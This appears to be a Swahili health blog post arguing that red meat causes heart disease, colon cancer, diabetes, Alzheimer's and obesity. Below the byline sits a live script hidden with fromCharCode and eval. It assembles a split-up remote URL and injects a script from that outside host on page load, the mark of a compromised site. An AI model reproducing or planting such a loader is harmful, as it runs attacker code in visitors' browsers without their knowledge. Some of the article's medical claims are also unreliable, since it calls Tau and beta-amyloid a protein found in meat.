Recent Comments

Hii ndiyo Hatari ya Kula Nyama Nyekundu Kupitia kiasi

By ventas malack Jan 5, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Kiukweli Nyama chakula muhimu Sana kwa binadamu kutokana na virutubishi inavyovizalisha, japo kuna wakati huwa na madhara makubwa kwa miili ya binadamu. Watu wengi hawajui kuwa Nyama hutofautiana ambapo kuna makundi mawili ya nyama ambapo kuna nyama nyeupe na nyama nyekundu, nyama nyeupe ni ile inayokuwa na rangi nyeupe kabla ya kupikwa mfano kuku, bata, samaki na nyekundu ni ile yenye rangi nyekundu ikiwa mbichi kama ng’ ombe, mbuzi na ikiwva huwa na rangi ya kahawia.


Kuna tafiti mbalimbali zinazoonesha matumizi ya nyama nyekundu yana madhara zaidi kuliko matumizi ya nyama nyeupe, kwa wale watu ambao hawali nyama kabisa wako mbali sana na hatari hizo.


Madhara hayo ni kama vile;
1: Husababisha Magonjwa ya Moyo
Matumizi ya nyama iliyo nyekundu kila mara hupelekea kufeli kwa baadhi ya viungo vya mwili hususani nyama nyekundu hivyo basili mwili kufeli hasa moyo. Nyama nyekundu ina kitu kinachoitwa lehemu kwa wingi, kitaalamu ni ‘ cholesterol’ ambapo hii hukaa kwenye mishipa ya damu na kusababisha damu kushindwa kupita vizuri hivyo moyo kufeli.
2: Hupelekea Saratani ya utumbo mkubwa
Hii hutokana na ulimbikizwaji wa nyama kwenye mfumo wa chakula ambapo ni hatari sana kwakuwa husababisha saratani hususani matumizi ya nyama nyekundu ambayo kitaalamu inakaa masaa ishirini kwenye mfumo wa chakula tofauti na vyakula vingine. Lakini madhara haya ayajaonekana inapotumiwa nyama nyeupe.
3: Hatari ya kupata Ugonjwa wa kisukari
Tafiti zimeonyesha kuwa watu wanaokula nyama kupindukia huweza kupata ugonjwa wa kisukari zaidi ya wasiotumia kutokana na vimeng’ enya vilivyopo kwenye nyama.

4: Hatari ya ugonjwa wa Alzheirs disease
Baadhi ya wanasayansi wanasema kuna protini kwenye nyama iitwayo Tau and beta- amyloid ambayo huharibu mishipa ya fahamu ya kwenye ubongo na kupelekea ugonjwa wa Alzheirs. Ambapo ugonjwa huu huathiri akili hasa uzeeni na kupelekea kupoteza kumbukumbu kabisa.
5: Husababisha Uzito na Unene uliopitiliza
Mara nyingi nyama nyekundu ina mafuta mengi ambayo ni sababu ya kuongezeka Unene na kitambi ambapo mafuta hayo hukaa kwenye damu mwilini hivyo ni hatari sana.
@Ventas Malack

By ventas malack

Make the World Aware